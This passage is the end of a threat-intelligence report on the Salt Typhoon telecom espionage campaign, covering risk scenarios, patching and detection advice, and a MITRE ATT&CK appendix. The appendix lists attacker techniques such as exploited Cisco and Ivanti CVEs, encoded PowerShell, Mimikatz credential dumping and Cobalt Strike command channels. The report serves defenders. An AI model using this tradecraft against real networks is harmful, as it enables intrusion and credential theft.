| Supply Chain Compromise | Targeting of telecom equipment manufacturers to implant backdoors pre-deployment | Strengthen software supply chain security; implement hardware root of trust |
| Cloud Infrastructure Targeting | Expansion from on-prem routers to cloud-based telecom functions (vRAN, cloud core) | Extend detection to cloud environments; implement cloud workload protection |
| Quantum-Resistant Cryptography Attacks | Preparation for future decryption of captured encrypted traffic | Begin migration to post-quantum cryptography for long-lived secrets |
| Geopolitical Trigger Activation | Potential activation of pre-positioned access during Taiwan contingency or other crisis | Develop crisis response playbooks; conduct tabletop exercises for disruption scenarios |
8.2 Emerging Risk Scenarios
Scenario 1: “Silent Disruption” During Crisis
- Trigger: Geopolitical escalation involving China
- Action: Salt Typhoon activates pre-positioned access to disrupt communications in target regions
- Impact: Degraded emergency services, impaired military coordination, economic disruption
- Mitigation: Develop “break-glass” procedures for rapid network isolation; maintain offline communication backups
Scenario 2: “Credential Cascade” via Authentication Infrastructure
- Trigger: Successful harvest of TACACS+/RADIUS credentials from telecom provider
- Action: Use stolen credentials to pivot into government/defense networks
- Impact: Compromise of classified systems; theft of sensitive policy communications
- Mitigation: Implement just-in-time privileged access; enforce MFA for all administrative sessions
Scenario 3: “Supply Chain Poisoning” of Telecom Equipment
- Trigger: Compromise of router firmware update mechanism at manufacturer
- Action: Distribute malicious firmware updates to customer networks globally
- Impact: Widespread compromise requiring coordinated global response
- Mitigation: Implement firmware signing verification; establish trusted update channels
9. RECOMMENDATIONS BY STAKEHOLDER
9.1 For Telecom Operators
- Patch Aggressively: Prioritize CVE-2023-20198/20273 (Cisco), CVE-2024-21887 (Ivanti), CVE-2024-3400 (Palo Alto)
- Isolate Management Planes: Use VRFs, dedicated out-of-band networks, and strict ACLs for device management
- Disable Unused Features: Turn off Guest Shell, HTTP management interfaces, and legacy protocols if not required
- Deploy Behavioral Detection: Implement NDR solutions that detect anomalous lateral movement and credential abuse
- Conduct Red Team Exercises: Simulate Salt Typhoon TTPs to validate detection and response capabilities
9.2 For Government Agencies
- Mandate Minimum Security Standards: Require telecom providers to implement CISA/NCIIPC baseline controls
- Enhance Intelligence Sharing: Establish secure channels for real-time threat intelligence exchange with industry
- Fund Critical Infrastructure Protection: Allocate resources for telecom security modernization and incident response
- Develop Crisis Response Playbooks: Prepare for scenarios where compromised infrastructure could be weaponized
- Coordinate International Response: Work with allies to attribute attacks and impose consequences on state sponsors
9.3 For Security Vendors
- Develop Telecom-Specific Detections: Create rules tuned to router CLI commands, SNMP patterns, and telecom protocols
- Improve LOTL Detection: Enhance behavioral analytics to distinguish legitimate admin activity from attacker use of native tools
- Support Cloud-Native Telecom: Extend detection capabilities to virtualized network functions and cloud-based core networks
- Provide Threat Intelligence Feeds: Deliver Salt Typhoon IOCs and TTPs in machine-readable formats for automated ingestion
- Offer Incident Response Support: Maintain specialized teams trained in telecom infrastructure forensics
9.4 For Individual Users
- Use End-to-End Encrypted Messaging: For sensitive communications, use Signal, WhatsApp (with E2EE enabled), or other encrypted platforms
- Enable Multi-Factor Authentication: Protect all accounts, especially email and financial services
- Monitor Account Activity: Review login histories and enable alerts for unusual access patterns
- Stay Informed: Follow guidance from national CERTs and trusted security sources
- Report Suspicious Activity: Notify your service provider or national CERT of potential security incidents
10. CONCLUSION
Salt Typhoon represents a new paradigm in state-sponsored cyber operations: infrastructure control as a strategic capability. Unlike traditional espionage campaigns focused on stealing data, Salt Typhoon seeks to own the communications infrastructure itself—enabling both continuous intelligence collection and potential disruption during crisis.
The campaign’s global scale (80+ countries), technical sophistication (kernel-mode rootkits, living-off-the-land techniques), and strategic patience (3+ year dwell times) demonstrate unprecedented resource allocation by China’s Ministry of State Security. The FBI’s February 2026 confirmation that threats remain “still very much ongoing” underscores that this is not a historical incident but an active, evolving campaign.
Defending against Salt Typhoon requires a fundamental shift:
- From signature-based detection to behavioral analytics
- From perimeter security to zero trust architecture
- From reactive incident response to proactive threat hunting
- From siloed security teams to integrated network/identity/cloud defense
Organizations operating critical communications infrastructure cannot afford to wait. The window for proactive hardening is narrowing as Salt Typhoon continues to adapt and expand. Immediate action on patching, network segmentation, and behavioral detection is essential to reduce risk.
As the geopolitical landscape evolves, the stakes will only increase. The infrastructure compromised today could become the weapon of tomorrow. Investing in resilience now is not just a security imperative—it is a strategic necessity.
APPENDICES
Appendix A: MITRE ATT&CK Mapping (Summary)
| Tactic | Key Techniques Observed | Salt Typhoon Implementation |
|---|---|---|
| Initial Access | T1190: Exploit Public-Facing Application | CVE-2023-20198 (Cisco), CVE-2024-21887 (Ivanti) |
| Execution | T1059: Command and Scripting Interpreter | PowerShell -ex bypass, WMIC remote execution |
| Persistence | T1547.001: Registry Run Keys; T1610: Deploy Container | reg add commands; Guest Shell container abuse |
| Privilege Escalation | T1068: Exploitation for Privilege Escalation | CVE-2023-20273 chaining; Demodex rootkit |
| Defense Evasion | T1027: Obfuscated Files; T1562.004: Disable Security Tools | Double-encoding; ACL modification to permit attacker IPs |
| Credential Access | T1003: OS Credential Dumping; T1040: Network Sniffing | Mimikatz; Cisco EPC for TACACS+ capture |
| Discovery | T1087: Account Discovery; T1016: System Network Configuration | net group /domain; SNMP enumeration |
| Lateral Movement | T1021: Remote Services; T1570: Lateral Tool Transfer | SMB copy + WMIC exec; service creation with installutil |
| Collection | T1005: Data from Local System; T1114: Email Collection | CDR extraction; email harvesting via compromised accounts |
| Command and Control | T1071: Application Layer Protocol; T1572: Protocol Tunneling | Cobalt Strike beacons; GRE/IPsec tunnels over routers |
| Exfiltration | T1048.003: Exfiltration Over Alternative Protocol | Encrypted SFTP via peering connections; low-and-slow transfers |